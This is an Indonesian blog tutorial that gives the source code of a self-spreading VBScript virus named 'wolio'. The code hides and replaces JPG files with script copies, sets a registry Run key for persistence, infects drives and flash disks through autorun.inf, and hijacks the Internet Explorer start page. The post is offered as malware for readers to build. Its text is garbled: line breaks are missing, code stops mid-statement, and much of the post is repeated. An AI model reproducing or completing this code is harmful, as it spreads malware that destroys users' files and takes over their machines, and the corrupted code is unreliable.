1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet ExplorerNah, demikianlah
skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)on error resume nextset ftarget=fso.GetFile(target)set fsource = fso.GetFile(Wscript.ScriptFullName)ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)ftarget.Deleteftarget.Closefsource.CloseEnd SubSub carifilejpg(folder)For Each filetarget in fso.GetFolder(folder).FilesIf (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)NextEnd Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()Set fso = CreateObject(”Scripting.FileSystemObject”)Set Drives=fso.drivesadaflashdisk = FalseFor Each drive in DrivesIf drive.isready Thenfsource.Copy(drive & “” & “wolio.vbs”)If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = TrueEnd IfNextIf adaflashdisk = True Thenset fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)fileautorun.WriteLine(”[AUTORUN]“)fileautorun.WriteLine(”RUN=wolio.vbs”)End IfEnd Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\StartPage”)<>”c:\windows\system32\wolio.html”) Thenregedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\StartPage”,”c:\windows\system32\wolio.html”End IfEnd Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)filehtml.WriteLine(””)filehtml.WriteLine(””)“)fileh
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)on error resume nextFor Each subfolder in fso.GetFolder(foldername).SubFoldersfsource.Copy(subfolder & “wolio.vbs”)carifilejpg(subfolder)nextEnd Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
On Error Resume Nextdim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,filehtml, fileautorundim adaflashdiskset fso = CreateObject(”Scripting.FileSystemObject”)set fsource = fso.GetFile(Wscript.ScriptFullName)set regedit=CreateObject(”WScript.Shell”)myfolder = Left(fsource,InStrRev(fsource,””))‘ Copy-kan diri ke “c:windowssystem32″fsource.Copy(”c:windowssystem32wolio.vbs”)‘ Cari dan infeksi file JPG didalam foldercarifilejpg(myfolder)‘ Copy-kan diri di sub folder yang adaserangan_folder(myfolder)‘ Regitryif(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<&g
2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
4. Menularkan diri pada drive-drive yang aktif termasuk flash disk
5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet ExplorerNah, demikianlah
skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:
1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)on error resume nextset ftarget=fso.GetFile(target)set fsource = fso.GetFile(Wscript.ScriptFullName)ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)ftarget.Deleteftarget.Closefsource.CloseEnd SubSub carifilejpg(folder)For Each filetarget in fso.GetFolder(folder).FilesIf (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)NextEnd Sub
2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()Set fso = CreateObject(”Scripting.FileSystemObject”)Set Drives=fso.drivesadaflashdisk = FalseFor Each drive in DrivesIf drive.isready Thenfsource.Copy(drive & “” & “wolio.vbs”)If drive.DriveType = 1 And drive.DriveLetter > “C:” Then adaflashdisk = TrueEnd IfNextIf adaflashdisk = True Thenset fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)fileautorun.WriteLine(”[AUTORUN]“)fileautorun.WriteLine(”RUN=wolio.vbs”)End IfEnd Sub
3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan
Sub serangan_ie()If (regedit.RegRead(”HKEY_CURRENT_USER\SOFTWARE\MicrosoftInternet Explorer\Main\StartPage”)<>”c:\windows\system32\wolio.html”) Thenregedit.RegWrite “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\StartPage”,”c:\windows\system32\wolio.html”End IfEnd Sub
4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)filehtml.WriteLine(””)filehtml.WriteLine(””)“)fileh
5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)on error resume nextFor Each subfolder in fso.GetFolder(foldername).SubFoldersfsource.Copy(subfolder & “wolio.vbs”)carifilejpg(subfolder)nextEnd Sub
6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
On Error Resume Nextdim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,filehtml, fileautorundim adaflashdiskset fso = CreateObject(”Scripting.FileSystemObject”)set fsource = fso.GetFile(Wscript.ScriptFullName)set regedit=CreateObject(”WScript.Shell”)myfolder = Left(fsource,InStrRev(fsource,””))‘ Copy-kan diri ke “c:windowssystem32″fsource.Copy(”c:windowssystem32wolio.vbs”)‘ Cari dan infeksi file JPG didalam foldercarifilejpg(myfolder)‘ Copy-kan diri di sub folder yang adaserangan_folder(myfolder)‘ Regitryif(regedit.RegRead(”HKEY_LOCAL_MACHINE\SOFTWAREMicrosoft\Windows\Current\Version\Run\Wolio”)<&g
Tidak ada komentar:
Posting Komentar
Kami Sangat Berterima Kasih. Jika Anda Mau Meninggalkan Pesan/Komentar/Saran/Kritikan untuk kemajuan Blog ini.